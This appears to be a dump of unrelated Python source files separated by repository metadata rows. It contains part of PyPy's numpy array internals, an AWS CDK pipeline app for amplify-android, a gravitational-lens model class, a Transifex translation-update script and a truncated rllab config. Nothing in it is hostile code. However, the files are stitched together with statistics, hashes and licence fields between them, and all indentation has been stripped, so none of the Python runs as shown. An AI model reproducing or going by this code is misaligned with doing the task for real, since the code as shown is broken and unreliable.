w_value = convert_to_array(space, w_value)
chunks = self._prepare_slice_args(space, w_index)
view = new_view(space, orig_arr, chunks)
view.implementation.setslice(space, w_value)
def transpose(self, orig_array, axes=None):
if len(self.get_shape()) < 2:
return self
strides = []
backstrides = []
shape = []
if axes is None:
axes = range(len(self.get_shape()) - 1, -1, -1)
for i in axes:
strides.append(self.get_strides()[i])
backstrides.append(self.get_backstrides()[i])
shape.append(self.get_shape()[i])
return SliceArray(self.start, strides,
backstrides, shape, self, orig_array)
def copy(self, space, order=NPY.ANYORDER):
if order == NPY.ANYORDER:
order = NPY.KEEPORDER
return self.astype(space, self.dtype, order, copy=True)
def create_iter(self, shape=None, backward_broadcast=False):
if shape is not None and \
support.product(shape) > support.product(self.get_shape()):
r = calculate_broadcast_strides(self.get_strides(),
self.get_backstrides(),
self.get_shape(), shape,
backward_broadcast)
i = ArrayIter(self, support.product(shape), shape, r[0], r[1])
else:
i = ArrayIter(self, self.get_size(), self.shape,
self.strides, self.backstrides)
return i, i.reset()
def swapaxes(self, space, orig_arr, axis1, axis2):
shape = self.get_shape()[:]
strides = self.get_strides()[:]
backstrides = self.get_backstrides()[:]
shape[axis1], shape[axis2] = shape[axis2], shape[axis1]
strides[axis1], strides[axis2] = strides[axis2], strides[axis1]
backstrides[axis1], backstrides[axis2] = backstrides[axis2], backstrides[axis1]
return W_NDimArray.new_slice(space, self.start, strides,
backstrides, shape, self, orig_arr)
def nonzero(self, space, index_type):
s = loop.count_all_true_concrete(self)
box = index_type.itemtype.box
nd = len(self.get_shape()) or 1
w_res = W_NDimArray.from_shape(space, [s, nd], index_type)
loop.nonzero(w_res, self, box)
w_res = w_res.implementation.swapaxes(space, w_res, 0, 1)
l_w = [w_res.descr_getitem(space, space.newint(d)) for d in range(nd)]
return space.newtuple(l_w)
##def get_storage(self):
## return self.storage
## use a safer context manager
def __enter__(self):
return self.storage
def __exit__(self, typ, value, traceback):
keepalive_until_here(self)
def get_buffer(self, space, flags):
errtype = space.w_ValueError # should be BufferError, numpy does this instead
if ((flags & space.BUF_C_CONTIGUOUS) == space.BUF_C_CONTIGUOUS and
not self.flags & NPY.ARRAY_C_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not C-contiguous")
if ((flags & space.BUF_F_CONTIGUOUS) == space.BUF_F_CONTIGUOUS and
not self.flags & NPY.ARRAY_F_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not Fortran contiguous")
if ((flags & space.BUF_ANY_CONTIGUOUS) == space.BUF_ANY_CONTIGUOUS and
not (self.flags & NPY.ARRAY_F_CONTIGUOUS and
self.flags & NPY.ARRAY_C_CONTIGUOUS)):
raise oefmt(errtype, "ndarray is not contiguous")
if ((flags & space.BUF_STRIDES) != space.BUF_STRIDES and
not self.flags & NPY.ARRAY_C_CONTIGUOUS):
raise oefmt(errtype, "ndarray is not C-contiguous")
if ((flags & space.BUF_WRITABLE) == space.BUF_WRITABLE and
not self.flags & NPY.ARRAY_WRITEABLE):
raise oefmt(errtype, "buffer source array is read-only")
readonly = not (flags & space.BUF_WRITABLE) == space.BUF_WRITABLE
return ArrayBuffer(self, readonly)
def astype(self, space, dtype, order, copy=True):
# copy the general pattern of the strides
# but make the array storage contiguous in memory
shape = self.get_shape()
strides = self.get_strides()
if order not in (NPY.KEEPORDER, NPY.FORTRANORDER, NPY.CORDER):
raise oefmt(space.w_ValueError, "Unknown order %d in astype", order)
if len(strides) == 0:
t_strides = []
backstrides = []
elif order in (NPY.FORTRANORDER, NPY.CORDER):
t_strides, backstrides = calc_strides(shape, dtype, order)
else:
indx_array = range(len(strides))
list_sorter = StrideSort(indx_array, strides, self.order)
list_sorter.sort()
t_elsize = dtype.elsize
t_strides = strides[:]
base = dtype.elsize
for i in indx_array:
t_strides[i] = base
base *= shape[i]
backstrides = calc_backstrides(t_strides, shape)
order = support.get_order_as_CF(self.order, order)
impl = ConcreteArray(shape, dtype, order, t_strides, backstrides)
if copy:
loop.setslice(space, impl.get_shape(), impl, self)
return impl
OBJECTSTORE = lltype.GcStruct('ObjectStore',
('length', lltype.Signed),
('step', lltype.Signed),
('storage', llmemory.Address),
rtti=True)
offset_of_storage = llmemory.offsetof(OBJECTSTORE, 'storage')
offset_of_length = llmemory.offsetof(OBJECTSTORE, 'length')
offset_of_step = llmemory.offsetof(OBJECTSTORE, 'step')
V_OBJECTSTORE = lltype.nullptr(OBJECTSTORE)
def customtrace(gc, obj, callback, arg):
#debug_print('in customtrace w/obj', obj)
length = (obj + offset_of_length).signed[0]
step = (obj + offset_of_step).signed[0]
storage = (obj + offset_of_storage).address[0]
#debug_print('tracing', length, 'objects in ndarray.storage')
i = 0
while i < length:
gc._trace_callback(callback, arg, storage)
storage += step
i += 1
lambda_customtrace = lambda: customtrace
def _setup():
rgc.register_custom_trace_hook(OBJECTSTORE, lambda_customtrace)
@jit.dont_look_inside
def _create_objectstore(storage, length, elsize):
gcstruct = lltype.malloc(OBJECTSTORE)
# JIT does not support cast_ptr_to_adr
gcstruct.storage = llmemory.cast_ptr_to_adr(storage)
#print 'create gcstruct',gcstruct,'with storage',storage,'as',gcstruct.storage
gcstruct.length = length
gcstruct.step = elsize
return gcstruct
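# Illustrative aside (not part of the original module): OBJECTSTORE together
# with the custom trace hook above is how the GC finds object references that
# live inside the raw storage of an object-dtype ndarray.  Conceptually the
# hook just walks the buffer with a fixed stride:
#
#   for i in range(length):
#       visit(storage + i * step)    # report one GC reference per element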
class ConcreteArrayNotOwning(BaseConcreteArray):
def __init__(self, shape, dtype, order, strides, backstrides, storage, start=0):
make_sure_not_resized(shape)
make_sure_not_resized(strides)
make_sure_not_resized(backstrides)
self.shape = shape
# already tested for overflow in from_shape_and_storage
self.size = support.product(shape) * dtype.elsize
if order not in (NPY.CORDER, NPY.FORTRANORDER):
raise oefmt(dtype.itemtype.space.w_ValueError, "ConcreteArrayNotOwning but order is not 0,1 rather %d", order)
self.order = order
self.dtype = dtype
self.strides = strides
self.backstrides = backstrides
self.storage = storage
self.start = start
self.gcstruct = V_OBJECTSTORE
def fill(self, space, box):
self.dtype.itemtype.fill(
self.storage, self.dtype.elsize, self.dtype.is_native(),
box, 0, self.size, 0, self.gcstruct)
def set_shape(self, space, orig_array, new_shape):
if len(new_shape) > NPY.MAXDIMS:
raise oefmt(space.w_ValueError,
"sequence too large; cannot be greater than %d", NPY.MAXDIMS)
try:
ovfcheck(support.product_check(new_shape) * self.dtype.elsize)
except OverflowError as e:
raise oefmt(space.w_ValueError, "array is too big.")
strides, backstrides = calc_strides(new_shape, self.dtype,
self.order)
return SliceArray(self.start, strides, backstrides, new_shape, self,
orig_array)
def set_dtype(self, space, dtype):
# size/shape/strides shouldn't change
assert dtype.elsize == self.dtype.elsize
self.dtype = dtype
def argsort(self, space, w_axis):
from .selection import argsort_array
return argsort_array(self, space, w_axis)
def sort(self, space, w_axis, w_order):
from .selection import sort_array
return sort_array(self, space, w_axis, w_order)
def base(self):
return None
class ConcreteArray(ConcreteArrayNotOwning):
def __init__(self, shape, dtype, order, strides, backstrides,
storage=lltype.nullptr(RAW_STORAGE), zero=True):
gcstruct = V_OBJECTSTORE
flags = NPY.ARRAY_ALIGNED | NPY.ARRAY_WRITEABLE
try:
length = support.product_check(shape)
self.size = ovfcheck(length * dtype.elsize)
except OverflowError:
raise oefmt(dtype.itemtype.space.w_ValueError, "array is too big.")
if storage == lltype.nullptr(RAW_STORAGE):
if dtype.num == NPY.OBJECT:
storage = dtype.itemtype.malloc(length * dtype.elsize, zero=True)
gcstruct = _create_objectstore(storage, length, dtype.elsize)
else:
storage = dtype.itemtype.malloc(length * dtype.elsize, zero=zero)
flags |= NPY.ARRAY_OWNDATA
start = calc_start(shape, strides)
ConcreteArrayNotOwning.__init__(self, shape, dtype, order, strides, backstrides,
storage, start=start)
self.gcstruct = gcstruct
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def __del__(self):
if self.gcstruct:
self.gcstruct.length = 0
free_raw_storage(self.storage, track_allocation=False)
class ConcreteArrayWithBase(ConcreteArrayNotOwning):
def __init__(self, shape, dtype, order, strides, backstrides, storage,
orig_base, start=0):
ConcreteArrayNotOwning.__init__(self, shape, dtype, order,
strides, backstrides, storage, start)
self.orig_base = orig_base
if isinstance(orig_base, W_NumpyObject):
flags = orig_base.get_flags() & NPY.ARRAY_ALIGNED
flags |= orig_base.get_flags() & NPY.ARRAY_WRITEABLE
else:
flags = 0
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def base(self):
return self.orig_base
class ConcreteNonWritableArrayWithBase(ConcreteArrayWithBase):
def __init__(self, shape, dtype, order, strides, backstrides, storage,
orig_base, start=0):
ConcreteArrayWithBase.__init__(self, shape, dtype, order, strides,
backstrides, storage, orig_base, start)
self.flags &= ~ NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class NonWritableArray(ConcreteArray):
def __init__(self, shape, dtype, order, strides, backstrides,
storage=lltype.nullptr(RAW_STORAGE), zero=True):
ConcreteArray.__init__(self, shape, dtype, order, strides, backstrides,
storage, zero)
self.flags &= ~ NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class SliceArray(BaseConcreteArray):
def __init__(self, start, strides, backstrides, shape, parent, orig_arr,
dtype=None):
self.strides = strides
self.backstrides = backstrides
self.shape = shape
if dtype is None:
dtype = parent.dtype
if isinstance(parent, SliceArray):
parent = parent.parent # one level only
self.parent = parent
self.storage = parent.storage
self.gcstruct = parent.gcstruct
if parent.order not in (NPY.CORDER, NPY.FORTRANORDER):
raise oefmt(dtype.itemtype.space.w_ValueError, "SliceArray but parent order is not 0,1 rather %d", parent.order)
self.order = parent.order
self.dtype = dtype
try:
self.size = ovfcheck(support.product_check(shape) * self.dtype.elsize)
except OverflowError:
raise oefmt(dtype.itemtype.space.w_ValueError, "array is too big.")
self.start = start
self.orig_arr = orig_arr
flags = parent.flags & NPY.ARRAY_ALIGNED
flags |= parent.flags & NPY.ARRAY_WRITEABLE
if is_c_contiguous(self):
flags |= NPY.ARRAY_C_CONTIGUOUS
if is_f_contiguous(self):
flags |= NPY.ARRAY_F_CONTIGUOUS
self.flags = flags
def base(self):
return self.orig_arr
def fill(self, space, box):
loop.fill(self, box.convert_to(space, self.dtype))
def set_shape(self, space, orig_array, new_shape):
if len(new_shape) > NPY.MAXDIMS:
raise oefmt(space.w_ValueError,
"sequence too large; cannot be greater than %d", NPY.MAXDIMS)
try:
ovfcheck(support.product_check(new_shape) * self.dtype.elsize)
except OverflowError as e:
raise oefmt(space.w_ValueError, "array is too big.")
if len(self.get_shape()) < 2 or self.size == 0:
# TODO: this code could be refactored into calc_strides
# but then calc_strides would have to accept a stepping factor
strides = []
backstrides = []
dtype = self.dtype
try:
s = self.get_strides()[0] // dtype.elsize
except IndexError:
s = 1
if self.order != NPY.FORTRANORDER:
new_shape.reverse()
for sh in new_shape:
strides.append(s * dtype.elsize)
backstrides.append(s * (sh - 1) * dtype.elsize)
s *= max(1, sh)
if self.order != NPY.FORTRANORDER:
strides.reverse()
backstrides.reverse()
new_shape.reverse()
return self.__class__(self.start, strides, backstrides, new_shape,
self, orig_array)
new_strides = calc_new_strides(new_shape, self.get_shape(),
self.get_strides(),
self.order)
if new_strides is None or len(new_strides) != len(new_shape):
raise oefmt(space.w_AttributeError,
"incompatible shape for a non-contiguous array")
new_backstrides = [0] * len(new_shape)
for nd in range(len(new_shape)):
new_backstrides[nd] = (new_shape[nd] - 1) * new_strides[nd]
return self.__class__(self.start, new_strides, new_backstrides, new_shape,
self, orig_array)
def sort(self, space, w_axis, w_order):
from .selection import sort_array
return sort_array(self, space, w_axis, w_order)
class NonWritableSliceArray(SliceArray):
def __init__(self, start, strides, backstrides, shape, parent, orig_arr,
dtype=None):
SliceArray.__init__(self, start, strides, backstrides, shape, parent,
orig_arr, dtype)
self.flags &= ~NPY.ARRAY_WRITEABLE
def descr_setitem(self, space, orig_array, w_index, w_value):
raise oefmt(space.w_ValueError, "assignment destination is read-only")
class VoidBoxStorage(BaseConcreteArray):
def __init__(self, size, dtype):
self.storage = alloc_raw_storage(size)
self.gcstruct = V_OBJECTSTORE
self.dtype = dtype
self.size = size
self.flags = (NPY.ARRAY_C_CONTIGUOUS | NPY.ARRAY_F_CONTIGUOUS |
NPY.ARRAY_WRITEABLE | NPY.ARRAY_ALIGNED)
def __del__(self):
free_raw_storage(self.storage)
class ArrayBuffer(Buffer):
_immutable_ = True
def __init__(self, impl, readonly):
self.impl = impl
self.readonly = readonly
def getitem(self, index):
return raw_storage_getitem(lltype.Char, self.impl.storage,
index + self.impl.start)
def setitem(self, index, v):
# XXX what if self.readonly?
raw_storage_setitem(self.impl.storage, index + self.impl.start,
rffi.cast(lltype.Char, v))
def getlength(self):
return self.impl.size - self.impl.start
def get_raw_address(self):
from rpython.rtyper.lltypesystem import rffi
return rffi.ptradd(self.impl.storage, self.impl.start)
def getformat(self):
sb = StringBuilder()
self.impl.dtype.getformat(sb)
return sb.build()
def getitemsize(self):
return self.impl.dtype.elsize
def getndim(self):
return len(self.impl.shape)
def getshape(self):
return self.impl.shape
def getstrides(self):
return self.impl.strides
| 41.453083
| 124
| 0.603835
|
9b2660421489a2dcf90a9f11b247b832641c0bb9
| 2,224
|
py
|
Python
|
src/build_infrastructure/android/app.py
|
ammarkarachi/amplify-ci-support
|
f3ebefa2e64eba64b7bb05aad51e1e91f0c74112
|
[
"Apache-2.0"
] | 1
|
2021-07-07T10:50:45.000Z
|
2021-07-07T10:50:45.000Z
|
src/build_infrastructure/android/app.py
|
yuth/amplify-ci-support
|
eab10558f1880bf9565dfa1aaf50d47de48de667
|
[
"Apache-2.0"
] | null | null | null |
src/build_infrastructure/android/app.py
|
yuth/amplify-ci-support
|
eab10558f1880bf9565dfa1aaf50d47de48de667
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import os
from aws_cdk import (
core,
aws_codepipeline_actions
)
from stacks.build_pipeline_stack import AmplifyAndroidCodePipeline
from stacks.account_bootstrap_stack import AccountBootstrap
from stacks.maven_release_stack import MavenReleaseStack
app = core.App()
TARGET_REGION = app.node.try_get_context("region")
TARGET_ACCOUNT = app.node.try_get_context("account")
TARGET_ENV=core.Environment( account=TARGET_ACCOUNT, region=TARGET_REGION)
REPO='amplify-android'
github_owner=app.node.try_get_context("github_owner")
branch=app.node.try_get_context("branch")
config_source_bucket = app.node.try_get_context("config_source_bucket")
release_pr_branch = app.node.try_get_context("release_pr_branch")
log_level=app.node.try_get_context("log_level")
print(f"AWS Account={TARGET_ACCOUNT} Region={TARGET_REGION}")
# Account bootstrap stack
account_bootstrap = AccountBootstrap(app, "AccountBootstrap", {}, env=TARGET_ENV)
# Unit and integration test stack
code_pipeline_stack_props = {
# If set, config files for tests will be copied from S3. Otherwise, it will attempt to retrieve using the Amplify CLI
'config_source_bucket': account_bootstrap.config_source_bucket.bucket_name,
'github_source': {
'owner': github_owner,
'repo': REPO ,
'base_branch': branch
},
'device_farm_project_name': 'AmplifyAndroidDeviceFarmTests',
'codebuild_project_name_prefix': 'AmplifyAndroid'
}
pipeline_stack = AmplifyAndroidCodePipeline(app,
"AndroidBuildPipeline",
code_pipeline_stack_props,
description="CI Pipeline assets for amplify-android",
env=TARGET_ENV)
# Maven publisher stack
maven_publisher_stack_props = {
'github_source': {
'owner': github_owner,
'repo': REPO,
'base_branch': branch,
'release_pr_branch': release_pr_branch
},
'codebuild_project_name_prefix': 'AmplifyAndroid'
}
MavenReleaseStack(app, "MavenPublisher", maven_publisher_stack_props, description="Assets used for publishing amplify-android to maven.", env=TARGET_ENV)
app.synth()
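# Illustrative usage note (not part of the original app): the context values read
# above via try_get_context are normally supplied on the CDK command line, e.g.
#
#   cdk deploy -c region=us-west-2 -c account=123456789012 \
#       -c github_owner=aws-amplify -c branch=main
#
# (the concrete values shown are placeholders, not taken from the repository).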
| 34.75
| 153
| 0.724371
|
0d3e7c8f37ed185b15e388634718a6248ca4ce54
| 5,423
|
py
|
Python
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | 2
|
2020-02-20T02:27:16.000Z
|
2020-02-20T08:38:23.000Z
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | 1
|
2021-11-15T17:50:20.000Z
|
2021-11-15T17:50:20.000Z
|
MagniPy/Workflow/grism_lenses/lens2033_satlocobs.py
|
dangilman/MagniPy
|
820b82ea0f6559c895f11c92d93de475a92d38b0
|
[
"MIT"
] | null | null | null |
import numpy as np
from MagniPy.lensdata import Data
from MagniPy.LensBuild.defaults import get_default_SIE_random, get_default_SIE
from MagniPy.util import approx_theta_E
from MagniPy.Workflow.grism_lenses.quad import Quad
class WFI2033_satlocobs(Quad):
x = np.array([-0.751, -0.039, 1.445, -0.668])
y = np.array([0.953, 1.068, -0.307, -0.585])
m = np.array([1., 0.65, 0.5, 0.53])
time_delay_AB, delta_AB = 0, 100
time_delay_AC, delta_AC = -36.2, 0.8
time_delay_AD, delta_AD = 23.3, 1.4
# delta_time_delay = np.array([delta_AB, delta_AC, delta_AD])
# relative_arrival_times = np.array([time_delay_AB, time_delay_AC, time_delay_AD])
relative_arrival_times = np.array([0.01, 36.2, 23.3 + 36.2])
delta_time_delay = np.array([delta_AB, delta_AC, np.sqrt(delta_AC**2 + delta_AD**2)])
sigma_x = np.array([0.005]*4)
sigma_y = np.array([0.005]*4)
sigma_m = np.zeros_like(sigma_x)
zsrc, zlens = 1.66, 0.66
# source redshift from Motta et al
data = Data(x, y, m, None, None,
sigma_x = sigma_x, sigma_y = sigma_y,
sigma_m=sigma_m)
identifier = 'lens2033'
flux_ratio_index = 0
fluximg = ['A', 'B', 'C', 'D'][flux_ratio_index]
_macromodel = get_default_SIE(zlens)
_macromodel.lenstronomy_args['theta_E'] = approx_theta_E(x, y)
gamma_min = 1.9
gamma_max = 2.1
kwargs_lens_init = [{'theta_E': 1.0011161129638548, 'center_x': 0.0035639468432663527,
'center_y': 0.022250277854418788, 'e1': 0.013745407369119727,
'e2': 0.04242065788101877, 'gamma': 1.95},
{'gamma1': 0.1849727326105099, 'gamma2': -0.07557590574285741}]
kwargs_lens_light = [{'amp': 2500, 'R_sersic': 0.2, 'n_sersic': 4., 'center_x': None, 'center_y': None}]
kwargs_source_light = [{'amp': 1000, 'R_sersic': 0.08, 'n_sersic': 2.5, 'center_x': None, 'center_y': None,
'e1': 0.01, 'e2': -0.14}]
srcmin = 0.02
srcmax = 0.05
has_satellite = True
satellite_mass_model = ['SIS', 'SIS']
satellite1_pos_mass = [0.245, 2.037]
satellite2_pos_mass = [-3.965, -0.022]
satellite2_pos_mass_effective = [-3.63, -0.08]
satellite_redshift = [zlens, 0.745]
satellite_convention = ['phys', 'phys']
theta_E = (0.389*0.334)**0.5
kwargs_satellite_light = [{'amp': 800, 'R_sersic': 0.1, 'n_sersic': 3.,
'center_x': satellite1_pos_mass[0],
'center_y': satellite1_pos_mass[1]},
None]
satellite_kwargs = [{'theta_E': 0.03, 'center_x': satellite1_pos_mass[0], 'center_y': satellite1_pos_mass[1]},
{'theta_E': 0.93, 'center_x': satellite2_pos_mass[0],
'center_y': satellite2_pos_mass[1]}]
@staticmethod
def relative_time_delays(arrival_times):
trel = arrival_times[1:] - arrival_times[0]
trel = [abs(trel[0]), abs(trel[1]), abs(trel[1]) + abs(trel[2])]
return np.array(trel)
def optimize_fit(self, kwargs_fit={}, macro_init = None, print_output = False):
if 'datatofit' in kwargs_fit.keys():
data = kwargs_fit['datatofit']
del kwargs_fit['datatofit']
else:
data = self.data
if 'satellites' not in kwargs_fit.keys():
satellites = {}
satellites['lens_model_name'] = self.satellite_mass_model
satellites['z_satellite'] = self.satellite_redshift
satellites['kwargs_satellite'] = self.satellite_kwargs
satellites['position_convention'] = self.satellite_convention
kwargs_fit.update({'satellites': satellites})
optdata, optmodel = self._fit(data, self.solver, kwargs_fit, macromodel_init=macro_init)
if print_output:
self._print_output(optdata[0], optmodel[0])
return optdata[0], optmodel[0]
def optimize_fit_lensmodel(self, kwargs_fit={}, macro_init = None, print_output = False):
kwargs_fit.update({'identifier': self.identifier})
optdata, optmodel = self._fit_lensmodel(self.data, self.solver, kwargs_fit, macromodel_init=macro_init)
if print_output:
self._print_output(optdata[0], optmodel[0])
return optdata[0], optmodel[0]
def _print_output(self, optdata, optmodel):
macromodel = optmodel.lens_components[0]
print('optimized mags: ', optdata.m)
print('observed mags: ', self.data.m)
print('lensmodel fit: ')
print('Einstein radius: ', macromodel.lenstronomy_args['theta_E'])
print('shear, shear_theta:', macromodel.shear, macromodel.shear_theta)
print('ellipticity, PA:', macromodel.ellip_PA_polar()[0], macromodel.ellip_PA_polar()[1])
print('centroid: ', macromodel.lenstronomy_args['center_x'],
macromodel.lenstronomy_args['center_y'])
print('\n')
print('flux ratios w.r.t. image '+str(self.fluximg)+':')
print('observed: ', self.data.compute_flux_ratios(index=self.flux_ratio_index))
print('recovered: ', optdata.compute_flux_ratios(index=self.flux_ratio_index))
# lens = WFI2033()
# x, y = lens.x, lens.y
# col = ['k', 'r', 'm', 'g']
# import matplotlib.pyplot as plt
# for l in range(0, 4):
# plt.scatter(-x[l], y[l], color=col[l])
# plt.show()
| 38.460993
| 114
| 0.619214
|
fbc61746c687428060bb7d3bebd8185288369433
| 8,148
|
py
|
Python
|
contrib/devtools/update-translations.py
|
zero24x/ltx
|
045dd208b875bdf891f1f1a09249beaed6c55b0f
|
[
"MIT"
] | 2
|
2019-08-06T13:47:40.000Z
|
2020-05-06T21:57:31.000Z
|
contrib/devtools/update-translations.py
|
litex-dev/Litexcoin
|
9ddc29de3d76993edc43a72d6be6fb8c8b7adff8
|
[
"MIT"
] | null | null | null |
contrib/devtools/update-translations.py
|
litex-dev/Litexcoin
|
9ddc29de3d76993edc43a72d6be6fb8c8b7adff8
|
[
"MIT"
] | 3
|
2019-10-16T19:08:49.000Z
|
2020-05-08T01:16:11.000Z
|
#!/usr/bin/env python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'ltx_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
        except IndexError:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# If both numeric format specifiers and "others" are used, assume we're dealing
# with a Qt-formatted message. In the case of Qt formatting (see https://doc.qt.io/qt-5/qstring.html#arg)
# only numeric formats are replaced at all. This means "(percentage: %1%)" is valid, without needing
# any kind of escaping that would be necessary for strprintf. Without this, this function
# would wrongly detect '%)' as a printf format specifier.
if numeric:
other = []
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
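# Hedged illustration (added for this write-up, not part of the upstream script):
# exercise the two helpers above on a hypothetical message string. Numeric (Qt)
# specifiers take precedence, so the trailing '%s' is dropped by
# split_format_specifiers.
_example_specifiers = find_format_specifiers('Sent %1 of %2 blocks (%s)')
assert _example_specifiers == ['1', '2', 's']
assert split_format_specifiers(_example_specifiers) == ({'1', '2'}, [])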
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
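# Hedged illustration (added, not upstream): FIX_RE strips ASCII control bytes
# other than newline and carriage return, so stray control characters coming back
# from Transifex cannot break the XML parser later on.
assert remove_invalid_characters(b'ok\x00\x1ftext\n') == b'oktext\n'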
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
    text = text.replace("'", '&apos;')
    text = text.replace('"', '&quot;')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
        parser = ET.XMLParser(encoding='utf-8') # need to override the encoding because only 'utf-8' is understood, not 'utf8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
| 38.616114
| 124
| 0.633775
|
ff93d470b1e0aa6f3095869d96cfb037be94fe75
| 1,978
|
py
|
Python
|
rllab/config.py
|
jackwilkinson255/mbmpo_master
|
e9e0eaf542c7895764dcb0bfee28752818124ff2
|
[
"MIT"
] | 28
|
2018-11-15T14:14:23.000Z
|
2022-01-10T01:53:43.000Z
|
rllab/config.py
|
hongzimao/model_ensemble_meta_learning
|
8b1351df94dfe530efaff1118022315c8d877774
|
[
"MIT"
] | 3
|
2019-05-05T23:39:01.000Z
|
2021-06-15T15:28:06.000Z
|
rllab/config.py
|
hongzimao/model_ensemble_meta_learning
|
8b1351df94dfe530efaff1118022315c8d877774
|
[
"MIT"
] | 14
|
2018-11-15T16:47:02.000Z
|
2021-05-28T14:58:01.000Z
|
import os.path as osp
import os
PROJECT_PATH = osp.abspath(osp.join(osp.dirname(__file__), '..'))
LOG_DIR = PROJECT_PATH + "/data"
USE_TF = False
DOCKER_IMAGE = "DOCKER_IMAGE"
DOCKERFILE_PATH = "/path/to/Dockerfile"
KUBE_PREFIX = "rllab_"
DOCKER_LOG_DIR = "/tmp/expt"
POD_DIR = PROJECT_PATH + "/.pods"
AWS_S3_PATH = None
AWS_IMAGE_ID = None
AWS_INSTANCE_TYPE = "m4.xlarge"
AWS_KEY_NAME = "AWS_KEY_NAME"
AWS_SPOT = True
